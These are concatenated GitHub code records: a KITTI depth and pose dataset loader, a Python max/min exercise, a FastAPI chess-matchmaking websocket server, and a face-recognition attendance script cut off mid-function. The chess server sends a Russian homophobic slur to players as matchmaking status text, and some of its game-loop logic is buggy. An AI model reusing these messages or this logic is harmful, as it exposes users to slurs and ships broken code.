'_drive_' + seq3 + '_sync/image_02/data/' + seq4 + '.png'\n return path\n\n\ndef read_npz_depth(file, depth_type):\n \"\"\"Reads a .npz depth map given a certain depth_type.\"\"\"\n depth = np.load(file)[depth_type + '_depth'].astype(np.float32)\n return np.expand_dims(depth, axis=2)\n\n\ndef read_png_depth(file):\n \"\"\"Reads a .png depth map.\"\"\"\n depth_png = np.array(load_image(file), dtype=int)\n assert (np.max(depth_png) > 255), 'Wrong .png depth file'\n depth = depth_png.astype(np.float64) / 256.\n depth[depth_png == 0] = -1. # why pixels without depth are set to -1: normalized to the [-1, 1] range\n return np.expand_dims(depth, axis=2)\n\n\n########################################################################################################################\n#### DATASET\n########################################################################################################################\n\n\nclass KITTIDataset(Dataset):\n \"\"\"\n KITTI dataset class.\n\n Parameters\n ----------\n root_dir : str\n Path to the dataset\n file_list : str\n Split file, with paths to the images to be used, for example: 2011_09_26/2011_09_26_drive_0009_sync/0000000386.png\n train : bool\n True if the dataset will be used for training\n data_transform : Function\n Transformations applied to the sample\n depth_type : str\n Which depth type to load; two kinds: 'velodyne' and 'groundtruth' (annotated)\n with_pose : bool\n True if returning ground-truth pose\n back_context : int\n Number of backward frames to consider as context ??? context usually means the pixels around the current pixel; context features are some relation between the current pixel and its neighbors\n forward_context : int\n Number of forward frames to consider as context ??? can the context here be understood as neighboring frames??\n strides : tuple\n List of context strides\n with_dynamic : bool\n True if returning a dynamic dataset\n dynamic_list: list\n List including all the indexes of dynamic images (unlike file_list, which holds file paths, dynamic is a list storing the paths of the dynamic images, similar to self.paths below)\n\n \"\"\"\n\n def __init__(self, file_list, dynamic_list, train=True, with_dynamic=False,\n data_transform=to_tensor_transforms, depth_type='groundtruth', with_pose=False,\n backward_context=0, forward_context=0, strides=(1,)):\n # Assertions\n assert backward_context >= 0 and forward_context >= 0, 'Invalid contexts'\n\n self.backward_context = backward_context\n self.backward_context_paths = [] # stores ids\n self.forward_context = forward_context\n self.forward_context_paths = []\n\n self.with_context = (backward_context != 0 or forward_context != 0)\n # file_list = \"/home/zhanl/data/eigen_zhou_files.txt\",self.split=eigen_zhou_files\n self.split = file_list.split('/')[-1].split('.')[0]\n\n self.train = train\n self.dynamic_index = dynamic_list\n self.data_transform = data_transform\n\n self.with_dynamic = with_dynamic # whether this is a dynamic dataset\n\n self.depth_type = depth_type\n self.with_depth = depth_type != '' and depth_type is not None # True whenever depth_type is non-empty\n self.with_pose = with_pose\n\n # these caches keep records of previous reads\n self._cache = {} # stores the file count of the last folder path (per sequence, based on the number of depth maps)\n self.pose_cache = {}\n self.oxts_cache = {}\n self.calibration_cache = {}\n self.imu2velo_calib_cache = {}\n self.sequence_origin_cache = {}\n\n with open(file_list, \"r\") as f:\n data = f.readlines() # data is a list; each line is one element\n\n self.paths = []\n\n if self.with_dynamic:\n data = self.dynamic_index # no need to filter out rgb images without depth here: dynamic_list was already picked from the full dataset and satisfies that condition\n\n # Get file list from data: requires a txt file listing the path and file name of all training data (the pose file path could be added here too, or the pose computed each time)\n for i, fname in enumerate(data):\n # i.e. /home/zhanlei/data/kitti-raw/2011_10_03/2011_10_03_drive_0027_sync/image_02/data/0000000000.png\n #path = os.path.join(root_dir, fname.split()[0]) # split() with no separator breaks on whitespace by default\n path = fname.split()[0]\n #if os.path.exists(path) and not (fname in self.dynamic_index): # filter out frames that are in the dynamic list?\n if os.path.exists(path):\n if not self.with_depth: # depth information not needed\n self.paths.append(path)\n else: # if depth images are used as input, also add a depth path\n # Check if the depth file exists\n depth = self._get_depth_file(path) # depth is the depth-map path matching this rgb image, though it may not exist\n if depth is not None and os.path.exists(\n depth): # if no depth exists for the current rgb, the rgb is not added to the paths, which handles depth having ten fewer frames than rgb\n self.paths.append(path)\n # yields n rgb image paths (no depth-path list is needed here, since depth paths can be derived directly from rgb paths)\n\n # If using context, filter file list\n if self.with_context:\n paths_with_context = []\n # when strides is the tuple (1,), the loop below runs exactly once with stride=1\n for stride in strides:\n for idx, file in enumerate(self.paths):\n # the dynamic pool picks neighbor frames differently: step one entry within the list rather than idx-1\n backward_context_idxs, forward_context_idxs = \\\n self._get_sample_context(\n file, backward_context, forward_context, stride)\n if backward_context_idxs is not None and forward_context_idxs is not None:\n # if both the previous and the next frame exist; effectively the first and last frames of each sequence are dropped\n paths_with_context.append(self.paths[idx])\n self.forward_context_paths.append(forward_context_idxs)\n # self.backward_context_paths.append(backward_context_idxs[::-1]) # the backward set is ordered by decreasing id; reversed here so it can be read sequentially (ascending)\n self.backward_context_paths.append(backward_context_idxs)\n self.paths = paths_with_context # only keep paths of frames that have context (previous/next frames)\n # now the previous/next frame ids of each frame are known\n\n ####################################################################################################################\n # @ marks a python decorator: it adds behavior to a function without changing its code, e.g. wrapping: staticmethod(func)\n @staticmethod\n def _get_next_file(idx, file):\n # returns the path of the file idx positions after the current one? how are earlier paths read\n \"\"\"Get next file given next idx and current file.\"\"\"\n base, ext = os.path.splitext(os.path.basename(file)) # base=0000000000,ext=.png\n return os.path.join(os.path.dirname(file), str(idx).zfill(len(base)) + ext) # zfill right-aligns by padding zeros on the left\n\n @staticmethod\n def _get_parent_folder(image_file):\n \"\"\"Get the parent folder from image_file.\"\"\"\n return os.path.abspath(os.path.join(image_file, \"../../../../..\")) # the folder four levels up: this usage is still in question\n\n @staticmethod\n def _get_intrinsics(image_file, calib_data):\n \"\"\"Get intrinsics from the calib_data dictionary.\"\"\"\n for cam in ['left', 'right']:\n # Check for both cameras, if found replace and return intrinsics\n if IMAGE_FOLDER[cam] in image_file:\n # returns the P_rect_02 and P_rect_03 rows of the cam2cam calibration file, i.e. the intrinsics from the uv frame into the camera 2/3 frames\n return np.reshape(calib_data[IMAGE_FOLDER[cam].replace('image', 'P_rect')], (3, 4))[:, :3]\n\n @staticmethod\n def _read_raw_calib_file(folder):\n # reads the calibration files between the different camera coordinate frames\n \"\"\"Read raw calibration files from folder.\"\"\"\n return read_calib_file(os.path.join(folder, CALIB_FILE['cam2cam']))\n\n ########################################################################################################################\n #### DEPTH\n ########################################################################################################################\n\n def _read_depth(self, depth_file):\n \"\"\"Get the depth map from a file.\"\"\"\n if self.depth_type in ['velodyne']:\n return read_npz_depth(depth_file, self.depth_type)\n elif self.depth_type in ['groundtruth']:\n return read_png_depth(depth_file)\n else:\n raise NotImplementedError(\n 'Depth type {} not implemented'.format(self.depth_type))\n\n def _get_depth_file(self, image_file):\n \"\"\"Get the corresponding depth file from an image file.\"\"\"\n # one problem: depth and image counts are not one-to-one (depth usually starts at 5 and each sequence also ends five frames short of rgb)\n for cam in ['left', 'right']:\n if IMAGE_FOLDER[cam] in image_file:\n depth_file = image_file.replace(\n IMAGE_FOLDER[cam] + '/data', 'proj_depth/{}/{}'.format(\n self.depth_type, IMAGE_FOLDER[cam]))\n depth_file = depth_file.replace(\n 'raw', 'depth')\n if self.depth_type not in PNG_DEPTH_DATASETS:\n depth_file = depth_file.replace('png', 'npz')\n return depth_file\n\n # sample is a dict with three keys: id, image file name, image.\n def _get_sample_context(self, sample_name, backward_context, forward_context, stride=1):\n \"\"\"\n Get a sample context\n\n Parameters\n ----------\n sample_name : str\n Path + Name of the sample\n backward_context : int = 1\n Size of backward context\n forward_context : int = 1\n Size of forward context\n stride : int (step size) = 1\n Stride value to consider when building the context\n\n Returns\n -------\n backward_context : list of int\n List containing the indexes for the backward context\n forward_context : list of int\n List containing the indexes for the forward context\n \"\"\"\n base, ext = os.path.splitext(os.path.basename(sample_name))\n parent_folder = os.path.dirname(sample_name)\n \"\"\"not sure why, but after the changes below the code ran extremely slowly\n for cam in ['left', 'right']:\n if IMAGE_FOLDER[cam] in parent_folder:\n parent_folder_depth = parent_folder.replace(\n IMAGE_FOLDER[cam] + '/data', 'proj_depth/{}/{}'.format(\n self.depth_type, IMAGE_FOLDER[cam]))\n parent_folder_depth = parent_folder_depth.replace(\n 'raw', 'depth')\"\"\"\n # current_idx\n c_idx = int(base) # base = 0000000005, c_idx = 5\n\n # Check number of files in folder (this should also be changed to the count in the depth folder)\n if parent_folder in self._cache:\n max_num_files = self._cache[parent_folder]\n else:\n max_num_files = len(glob.glob(os.path.join(parent_folder, '*' + ext))) - 5 # number of files in the current directory; minus 5 because the index of the last depth map is 5 smaller than that of the last rgb image\n self._cache[parent_folder] = max_num_files # the largest depth index is 5 less than rgb\n\n # Check bounds\n if (c_idx - backward_context * stride) < 4 or (\n c_idx + forward_context * stride) > max_num_files:\n return None, None\n\n # Backward context: build the set of preceding images for the current frame; if its capacity is set to 1, is that enough for the similarity computation\n b_idx = c_idx\n backward_context_idxs = []\n # while changed to if so the loop runs only once and the context holds a single image:\n if len(backward_context_idxs) < backward_context and b_idx > 5: # accounts for depth starting from the fifth frame\n # while len(backward_context_idxs) < backward_context and c_idx > 0:\n #if b_idx > 5:\n b_idx -= stride\n else:\n b_idx += stride # if there is no predecessor (e.g. the first image), let the backward image id equal the forward one\n filename = self._get_next_file(b_idx, sample_name)\n if os.path.exists(filename):\n backward_context_idxs.append(b_idx) # records the id of the frame stride steps back\n\n # Forward context: build the set of following images for the current frame\n f_idx = c_idx\n forward_context_idxs = []\n if len(forward_context_idxs) < forward_context and f_idx < max_num_files-1:\n # while len(forward_context_idxs) < forward_context and c_idx < max_num_files:\n #if f_idx < max_num_files:\n f_idx += stride\n else:\n f_idx -= stride # for the last image, let the forward id equal the backward one\n filename = self._get_next_file(f_idx, sample_name)\n if os.path.exists(filename):\n forward_context_idxs.append(f_idx) # records the id of the frame stride steps ahead\n\n # returns the backward/forward frame lists (they contain only the image indexes, e.g. 0000000000)\n return backward_context_idxs, forward_context_idxs\n\n def _get_context_files(self, sample_name, idxs):\n \"\"\"\n Returns image and depth (and pose) context files\n i.e. every frame must have corresponding previous/next frames\n Parameters\n ----------\n sample_name : str\n Name of current sample\n idxs : list of idxs\n Context indexes\n\n Returns\n -------\n image_context_paths : list of str\n List of image names for the context\n depth_context_paths : list of str\n List of depth names for the context\n \"\"\"\n image_context_paths = [self._get_next_file(i, sample_name) for i in idxs]\n if self.with_depth:\n depth_context_paths = [self._get_depth_file(f) for f in image_context_paths]\n return image_context_paths, depth_context_paths\n else:\n return image_context_paths, None\n # returns the image paths of the context (previous/next) frames\n # the poses matching the context frames still have to be considered\n\n ########################################################################################################################\n #### POSE: the question is which point to use as the origin\n ########################################################################################################################\n\n def _get_imu2cam_transform(self, image_file):\n \"\"\"Gets the transformation between IMU and camera from an image file\"\"\"\n parent_folder = self._get_parent_folder(image_file)\n if image_file in self.imu2velo_calib_cache:\n return self.imu2velo_calib_cache[image_file]\n\n cam2cam = read_calib_file(os.path.join(parent_folder, CALIB_FILE['cam2cam']))\n imu2velo = read_calib_file(os.path.join(parent_folder, CALIB_FILE['imu2velo']))\n velo2cam = read_calib_file(os.path.join(parent_folder, CALIB_FILE['velo2cam']))\n\n velo2cam_mat = transform_from_rot_trans(velo2cam['R'], velo2cam['T'])\n imu2velo_mat = transform_from_rot_trans(imu2velo['R'], imu2velo['T'])\n # camera 00 rectification: 3x3 rectifying rotation matrix (makes the image planes coplanar), required for the conversion into the 2D frame\n cam_2rect_mat = transform_from_rot_trans(cam2cam['R_rect_00'], np.zeros(3))\n cam0_cam2_rec_mat = np.vstack((cam2cam['P_rect_02'].reshape(3, 4), [0, 0, 0, 1])) # P_rect_xx is a 3x4 matrix to begin with\n cam0_cam2_mat = transform_from_rot_trans(cam2cam['R_02'], cam2cam['T_02']) # cam0 into the cam2 frame\n\n # imu2cam = cam_2rect_mat @ velo2cam_mat @ imu2velo_mat # this yields the transform in camera 0's image coordinate frame\n imu2cam = cam0_cam2_mat @ velo2cam_mat @ imu2velo_mat # unsure whether this should also be multiplied by the rectification matrix\n # imu2cam = cam0_cam2_rec_mat @ cam_2rect_mat @ velo2cam_mat @ imu2velo_mat\n\n # cache the intrinsics for the current date (imu to cam2) so they are not recomputed every time\n self.imu2velo_calib_cache[image_file] = imu2cam\n return imu2cam\n\n @staticmethod\n def _get_oxts_file(image_file):\n \"\"\"Gets the oxts file from an image file.\"\"\"\n # find oxts pose file\n for cam in ['left', 'right']:\n # Check for both cameras, if found replace and return file name\n if IMAGE_FOLDER[cam] in image_file:\n return image_file.replace(IMAGE_FOLDER[cam], OXTS_POSE_DATA).replace('.png', '.txt')\n # Something went wrong (invalid image file)\n raise ValueError('Invalid KITTI path for pose supervision.')\n\n def _get_oxts_data(self, image_file):\n \"\"\"Gets the oxts data from an image file.\"\"\"\n oxts_file = self._get_oxts_file(image_file)\n if oxts_file in self.oxts_cache:\n oxts_data = self.oxts_cache[oxts_file]\n else:\n oxts_data = np.loadtxt(oxts_file, delimiter=' ', skiprows=0)\n self.oxts_cache[oxts_file] = oxts_data\n return oxts_data\n\n def _get_pose(self, image_file):\n \"\"\"Gets the pose information from an image file.\"\"\"\n if image_file in self.pose_cache:\n return self.pose_cache[image_file]\n\n # Find origin frame in this sequence to determine scale & origin translation\n base, ext = os.path.splitext(os.path.basename(image_file))\n origin_frame = os.path.join(os.path.dirname(image_file), str(0).zfill(len(base)) + ext) # the 0000000000.png of each sequence\n\n # Get origin data\n origin_oxts_data = self._get_oxts_data(origin_frame)\n lat = origin_oxts_data[0]\n scale = np.cos(lat * np.pi / 180.)\n # Get origin pose\n origin_R, origin_t = pose_from_oxts_packet(origin_oxts_data, scale)\n\n origin_pose = transform_from_rot_trans(origin_R, origin_t)\n # origin_pose1 = transform_from_angle_trans(origin_t, origin_angle)\n # of little use here: the transform matrices are all 3X3 and cannot be multiplied with a 1X6 pose, so the offset angles must be recomputed from the rotation matrix after the frame change (unclear how much computational complexity that adds)\n # Compute current pose\n oxts_data = self._get_oxts_data(image_file)\n R, t = pose_from_oxts_packet(oxts_data, scale)\n\n pose_imu = transform_from_rot_trans(R, t) # 4x4 transform matrix; if Euler angles are wanted, the previous step must be changed\n # pose1 = transform_from_angle_trans(t, angle)\n # Compute odometry pose\n imu2cam = self._get_imu2cam_transform(image_file)\n # @ is the matrix multiplication operator\n '''odo_pose = (imu2cam @ np.linalg.inv(origin_pose) @\n pose_imu @ np.linalg.inv(imu2cam)).astype(np.float32) # 4*4 @ inv(4*4) @ (4*4) @ inv(4*4) = 4*4, i.e. the rotation matrix carries no position information'''\n\n # taken from https://github.com/utiasSTARS/pykitti/blob/master/pykitti/utils.py and https://stackoverflow.com/questions/66672284/compute-pose-transformation-matrix-rotation-and-translation-from-gps-locatio\n pose_rot = transform_from_rot_trans(R, t - origin_t) # all poses here are relative to the first frame!!!!!\n pose = R_to_angle(pose_rot)\n pose = torch.from_numpy(pose)\n pose = pose.to(torch.float32)# yields a 6-DoF pose: translations along x, y, z and the angular offsets\n \"\"\"odo_pose1 = (imu2cam @ np.linalg.inv(origin_pose1) @\n #pose1 @ np.linalg.inv(imu2cam)).astype(np.float32) # 3*4 @ inv(3*2) @ (3*2) @ inv(3*4)\"\"\"\n\n # Cache and return pose\n # the pose computed for each image is added to the cache as well, so nothing is recomputed\n self.pose_cache[image_file] = pose\n return pose\n\n ########################################################################################################################\n\n def __len__(self):\n \"\"\"Dataset length.\"\"\"\n return len(self.paths)\n\n def __getitem__(self, idx):\n \"\"\"Get dataset sample given an index.\"\"\"\n # Add image information\n\n sample = {\n # 'idx': idx,\n #'filename': self.paths[idx], # eigen_zhou_files_idx zero-padded on the left to ten digits\n 'idx': extract_idx(self.paths[idx]), # encodes the date, the session and the index\n 'rgb': load_image(self.paths[idx]),\n }\n \"\"\" # Add intrinsics\n parent_folder = self._get_parent_folder(self.paths[idx])\n if parent_folder in self.calibration_cache:\n c_data = self.calibration_cache[parent_folder]\n else:\n c_data = self._read_raw_calib_file(parent_folder)\n self.calibration_cache[parent_folder] = c_data\n sample.update({\n # why the sample dict should return the intrinsics: image scaling parameters\n 'intrinsics': self._get_intrinsics(self.paths[idx], c_data),\n })\"\"\"\n\n # Add pose information if requested\n if self.with_pose:\n sample.update({\n 'pose': self._get_pose(self.paths[idx]),\n })\n\n # Add depth information if requested\n if self.with_depth:\n sample.update({\n 'depth': self._read_depth(self._get_depth_file(self.paths[idx])),\n })\n\n # how to handle the backward and forward contexts separately\n # Add context information if requested\n if self.with_context:\n # Add context images and depth\n all_context_idxs = self.backward_context_paths[idx] + \\\n self.forward_context_paths[idx] # what is the output if the two ids are identical\n image_context_paths, depth_context_paths = \\\n self._get_context_files(self.paths[idx], all_context_idxs)\n if self.with_dynamic:\n if idx > 0:\n backward_context_idxs = idx - 1\n else: # first frame of the dynamic pool\n backward_context_idxs = idx + 1\n if idx < len(self.paths) - 1:\n forward_context_idxs = idx + 1\n else: # last frame of the dynamic pool\n forward_context_idxs = idx - 1\n depth_context_paths.append(self._get_depth_file(self.paths[backward_context_idxs]))\n depth_context_paths.append(self._get_depth_file(self.paths[forward_context_idxs]))\n\n '''image_last_paths, depth_last_paths = \\\n self._get_context_files(self.paths[idx], self.backward_context_paths[idx])\n image_next_paths, depth_next_paths = \\\n self._get_context_files(self.paths[idx], self.forward_context_paths[idx])'''\n image_context = [load_image(f) for f in image_context_paths]\n image_last = image_context[0]\n image_next = 
image_context[-1] # 改成1的时候会报错:list index out of range\n sample.update({\n 'rgb_last': image_last,\n 'rgb_next': image_next\n })\n '''for f in image_last_paths:\n # global image_last\n image_last = load_image(f)\n sample.update({\n 'rgb_last': image_last\n })\n print(f)\n # global image_last_pose\n image_last_pose = self._get_pose(f)\n if self.with_pose:\n sample.update({\n 'pose_last': image_last_pose\n })\n\n for f in image_next_paths:\n # global image_next\n image_next = load_image(f)\n sample.update({\n 'rgb_next': image_next\n })\n # global image_next_pose\n image_next_pose = self._get_pose(f)\n if self.with_pose:\n sample.update({\n 'pose_next': image_next_pose\n })'''\n # image_last = load_image(set(image_last_paths)) # 返回的是列表型数据,len(image_last_paths)=1\n\n depth_context = [self._read_depth(f) for f in depth_context_paths] # depth_context需要筛除掉不存在的帧\n depth_last = depth_context[0]\n #print(depth_context_paths[0]) 这里读出帧的顺序又全部错乱了,应该是上面有一部是随机读取的\n depth_next = depth_context[-1]\n #print(depth_context_paths[-1])\n sample.update({\n 'depth_last': depth_last,\n 'depth_next': depth_next\n })\n '''for f in depth_last_paths:\n # global depth_last\n depth_last = self._read_depth(f)\n if self.with_depth:\n sample.update({\n 'depth_last': depth_last\n })\n for f in depth_last_paths:\n # global depth_next\n depth_next = self._read_depth(f)\n if self.with_depth:\n sample.update({\n 'depth_next': depth_next\n })'''\n\n '''if self.with_depth:\n \n sample.update({\n 'depth_last': depth_last,\n 'depth_next': depth_next\n })'''\n\n # Add context poses\n if self.with_pose: # 一般默认是True\n first_pose = sample['pose']\n image_context_pose = [self._get_pose(f) for f in image_context_paths]\n pose_last = image_context_pose[0]\n pose_next = image_context_pose[-1]\n sample.update({\n 'pose_last': pose_last,\n 'pose_next': pose_next\n })\n\n # image_last_pose = self._get_pose(set(image_last_paths))\n # image_next_pose = self._get_pose(set(image_next_paths))\n \"\"\"image_context_pose = [invert_pose_numpy(context_pose) @ first_pose\n for context_pose in image_context_pose] # 这里又出现问题了\"\"\"\n '''sample.update({\n 'pose_last': image_last_pose,\n 'pose_next': image_next_pose\n })'''\n # Apply transformations\n if self.data_transform:\n sample = self.data_transform(sample)\n\n \"\"\"sample_new = deepcopy(sample)\n sample = None\n self.paths[idx] = None\n self.backward_context_paths[idx] = None\n self.forward_context_paths[idx] = None\"\"\"\n # Return sample\n #return sample['idx'], sample['rgb'], sample['depth'], sample['pose'], sample['rgb_last'], sample['rgb_next'], sample['depth_last'], sample['depth_next'], sample['pose_last'], sample['pose_next']\n return sample\n\n\nclass data_prefetcher():\n def __init__(self, loader):\n self.loader = iter(loader)\n self.stream = torch.cuda.Stream()\n #self.data_ransformer dataloader中已经预处理了,这一步还需要预处理吗?\n # With Amp, it isn't necessary to manually convert data to half.\n # if args.fp16:\n # self.mean = self.mean.half()\n # self.std = self.std.half()\n self.preload()\n\n def preload(self):\n try:\n self.sample = next(self.loader)\n except StopIteration:\n self.sample = None\n return\n with torch.cuda.stream(self.stream):\n #self.sample = self.sample.cuda(non_blocking=True)\n self.sample = {key: self.sample[key].to(device, non_blocking=True) for key in self.sample}\n\n # With Amp, it isn't necessary to manually convert data to half.\n # if args.fp16:\n # self.next_input = self.next_input.half()\n # else:\n\n def next(self):\n torch.cuda.current_stream().wait_stream(self.stream)\n 
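# wait_stream() above makes the default stream wait for the copy issued in preload(), so this sample is now safe to consume\n        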
sample = self.sample\n        self.preload()\n        return sample\n\n\n########################################################################################################################\nif __name__ == \"__main__\":\n    kitti_dataset = KITTIDataset(file_list='/home/zhanl/data/kitti/data_splits/train.txt',\n                                 dynamic_list=None,\n                                 data_transform=to_tensor_transforms,\n                                 forward_context=1,\n                                 backward_context=1,\n                                 depth_type='groundtruth',\n                                 with_pose=True) # when resizing, switch to proportional scaling\n\n    print(len(kitti_dataset))\n","repo_name":"Zhuweilong123/motion_segment","sub_path":"dataset/original_method/kitti_dataset.py","file_name":"kitti_dataset.py","file_ext":"py","file_size_in_byte":31783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72021132649","text":"''' Exercise 6: \r\nRewrite the program that prompts the user for a list of numbers and prints out the maximum and minimum of the numbers at the end when \r\nthe user enters “done”. Write the program to store the numbers the user enters in a list and use the max() and min() functions to\r\ncompute the maximum and minimum numbers after the loop completes.\r\n'''\r\n\r\ntheList = list()\r\n\r\nwhile True:\r\n    userInput = input(\"Enter a number: \")\r\n    if userInput == 'done':\r\n        break\r\n    try:\r\n        num = float(userInput)\r\n    except:\r\n        print(\"Please enter a number\")\r\n        continue\r\n    theList.append(num)\r\n\r\nprint(\"Maximum\", max(theList))\r\nprint(\"Minimum\", min(theList))\r\n","repo_name":"YoonHCho/python-for-everybody","sub_path":"Course2/8.6_exercise.py","file_name":"8.6_exercise.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31184835136","text":"from datetime import datetime\nfrom sqlalchemy.exc import SQLAlchemyError\nimport uvicorn\nfrom fastapi import FastAPI, Depends\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom starlette.websockets import WebSocket, WebSocketDisconnect\nfrom src.api.authentication.base_config import auth_backend, fastapi_users\nfrom src.api.authentication.router import router as router_user, get_info_by_user_id\nfrom src.api.authentication.schemas import UserRead, UserCreate\nfrom src.api.matches.router import router as router_matches\nfrom src.database import get_async_session\nfrom src.game_engine.chess_engine import Game\nfrom src.game_engine.connection_manager import ConnectionManager, ConnectionManagerNew\nfrom src.game_engine.player import Player\nfrom src.game_engine.router import router as router_game_engine\n\n\napp = FastAPI(\n    title=\"Belchessmind.org\"\n)\n\n\norigins = [\"http://localhost\",\n           \"http://localhost:3000\",\n           \"http://localhost:8000\"]\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=[\"*\"],\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n    expose_headers=[\"*\"]\n)\n\napp.include_router(\n    fastapi_users.get_auth_router(auth_backend),\n    prefix=\"/auth/jwt\",\n    tags=[\"Auth\"],\n)\n\napp.include_router(\n    fastapi_users.get_register_router(UserRead, UserCreate),\n    prefix=\"/auth\",\n    tags=[\"Auth\"],\n)\n\napp.include_router(router_user)\napp.include_router(router_matches)\napp.include_router(router_game_engine)\n\n# manager = ConnectionManager()\nmanager = ConnectionManagerNew()\n\n\n# expected client message shape: {\"user_id\": 1, \"game_state\": \"qweqweqwe\"}\n\n\n@app.websocket('/wse/{user_id}')\nasync def add_to_queue_ws(websocket: WebSocket, user_id: int):\n    await 
manager.connect(websocket, user_id)\n try:\n while True:\n data = await websocket.receive_json()\n await manager.broadcast(websocket, {\n \"user_id\": manager.active_connections[websocket],\n \"game_state\": data[\"game_state\"]\n })\n except WebSocketDisconnect:\n manager.disconnect(websocket)\n await manager.broadcast(f\"Client #{user_id} left the chat\")\n\n\n@app.websocket(\"/ws/{mode_id}/{user_id}\")\nasync def add_to_queue_ws(websocket: WebSocket, mode_id: int, user_id: int,\n session: AsyncSession = Depends(get_async_session)):\n player = None\n player1 = None\n player2 = None\n\n try:\n await manager.connect_user(websocket)\n while True:\n # request_json = await websocket.receive_json()\n qwe = await websocket.receive_text()\n print(qwe)\n if qwe == \"q\":\n if mode_id in range(1, 10):\n is_rate = True\n else:\n is_rate = False\n user_data = await get_info_by_user_id(user_id, session)\n\n await websocket.send_text(user_data[\"data\"][\"nickname\"])\n\n player = Player(websocket, user_data[\"data\"]['id'], user_data[\"data\"]['nickname'],\n user_data[\"data\"]['rate_blitz'], user_data[\"data\"]['rate_rapid'],\n user_data[\"data\"]['rate_rapid'], mode_id, is_rate)\n\n await manager.add_player_to_queue(player)\n player1, player2 = await manager.find_new_game(mode_id)\n\n if player1 is None and player2 is None:\n await websocket.send_text(\"не пидарасы\")\n\n if player1 is not None and player2 is not None:\n await player1.websocket.send_text(\"пидарасы\")\n await player2.websocket.send_text(\"пидарасы\")\n await manager.remove_player_from_queues(player1)\n await manager.remove_player_from_queues(player2)\n time_start = datetime.utcnow()\n game = Game(player1, player2, mode_id, time_start, player1.is_rated_mode)\n await manager.add_game_to_list(game)\n await game.player1.send_game_state(game.get_state())\n await game.player2.send_game_state(game.get_state())\n\n await player1.websocket.send_text(\"else1\")\n await player2.websocket.send_text(\"else2\")\n elif qwe == \"w\":\n print(\"|||||||||qwe == w\")\n print(player1)\n print(player2)\n resp1 = await player1.websocket.receive_json()\n resp2 = await player2.websocket.receive_json()\n print(resp1)\n print(resp2)\n await player1.websocket.send_text(\"else1_qwe\")\n await player2.websocket.send_text(\"else2_qwe\")\n # await player1.websocket.send_text(await game.get_id_player_to_move())\n # await player2.websocket.send_text(await game.get_id_player_to_move())\n while True:\n print(\"qweqweqwe\")\n request_json = None\n if game.get_id_player_to_move() == 1:\n request_json = await player1.get_json()\n elif game.get_id_player_to_move() == 2:\n request_json = await player2.get_json()\n else:\n print(\"error validation\")\n\n if request_json[\"operation\"] == \"make_a_move\":\n if request_json[\"number_player\"] == 1:\n game = manager.find_curr_game(player1)\n elif request_json[\"number_player\"] == 2:\n game = manager.find_curr_game(player2)\n game.make_a_move(request_json[\"data\"][0], request_json[\"data\"][1],\n request_json[\"data\"][2], request_json[\"data\"][3])\n if game.is_game_end():\n player_winner = game.get_winner()\n player_loser = game.get_loser()\n await player_winner.send_message(\"you_win\")\n await player_loser.send_message(\"you_lose\")\n break\n await game.player1.send_game_state(game.get_state())\n await game.player2.send_game_state(game.get_state())\n elif request_json['operation'] == \"surrender\" or request_json['operation'] == \"time_over\":\n if request_json[\"number_player\"] == 1:\n game = 
manager.find_curr_game(player1)\n elif request_json[\"number_player\"] == 2:\n game = manager.find_curr_game(player2)\n if request_json[\"number_player\"] == 1:\n await player1.send_message(\"you_lose\")\n await player2.send_message(\"you_win\")\n player_winner = player2\n player_loser = player1\n break\n elif request_json[\"number_player\"] == 2:\n await player1.send_message(\"you_win\")\n await player2.send_message(\"you_lose\")\n player_winner = player1\n player_loser = player2\n break\n await manager.set_game_end_to_list(game)\n time_end = datetime.utcnow()\n time_length = time_end - time_start\n game_length = time_length.seconds\n rate_change_winner, rate_change_loser = 0, 0\n if game.is_rated:\n rate_change_winner, rate_change_loser = manager.count_rate_change(player_winner, player_loser)\n await manager.update_users_rate_in_db(mode_id, player_winner, player_loser,\n rate_change_winner, rate_change_loser)\n await manager.add_match_to_db(mode_id, time_start, game_length,\n player_winner.nickname, player_loser.nickname,\n player_winner.player_id, player_loser.player_id,\n rate_change_winner, rate_change_loser)\n await manager.delete_game_from_list(game)\n await player1.send_message(\"disconnecting\")\n await player2.send_message(\"disconnecting\")\n await manager.disconnect_user(player1)\n await manager.disconnect_user(player2)\n else:\n await websocket.send_text(\"else\")\n await websocket.send_text(\"else1234\")\n except WebSocketDisconnect as e:\n await manager.disconnect_user(websocket)\n await manager.remove_player_from_queues(player)\n await manager.clear_ended_games()\n return {\n \"status\": \"error\",\n \"data\": \"WebSocketDisconnect\",\n \"details\": str(e)\n }\n except SQLAlchemyError as e:\n return {\n \"status\": \"error\",\n \"data\": \"SQLAlchemyError\",\n \"details\": f\"Database error: {str(e)}\"\n }\n except Exception as e:\n return {\n \"status\": \"error\",\n \"data\": \"Exception\",\n \"details\": str(e)\n }\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\"src.main:app\", host=\"127.0.0.1\", port=8000, reload=True)\n\n","repo_name":"ilya1004/ProjectFiles","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72911369448","text":"import face_recognition\nimport cv2\nimport os\nimport pyttsx3\nimport numpy as n\nfrom datetime import datetime\npath='images'\ni=[]\nc=[]\nq=[]\nmy=os.listdir(path)\nprint(my)\nfor c1 in my:\n im=cv2.imread(f'{path}/{c1}')\n i.append(im)\n c.append(os.path.splitext(c1)[0])\ndef speak(text):\n e=pyttsx3.init()\n e.say(text)\n e.runAndWait()\nspeak(\"hi\")\ndef attendance(n2):\n with open('attendance','r+') as f:\n lis=f.readlines()\n newlist=[]\n for i in lis:\n entry=i.split(',')\n newlist.append(entry[0])\n if n2 not in newlist:\n print(newlist)\n speak(n2 + \"attendance has been recorded\")\n no=datetime.now()\n ds=no.strftime('%H:%M:%S')\n f.write(f'\\n{n2},{ds}')\n else:\n speak(\"Your attendance has already been recorded\")\ndef encode(i):\n encode1=[]\n for v in i:\n v= cv2.cvtColor(v, cv2.COLOR_BGR2RGB)\n h = face_recognition.face_encodings(v)[0]\n encode1.append(h)\n return 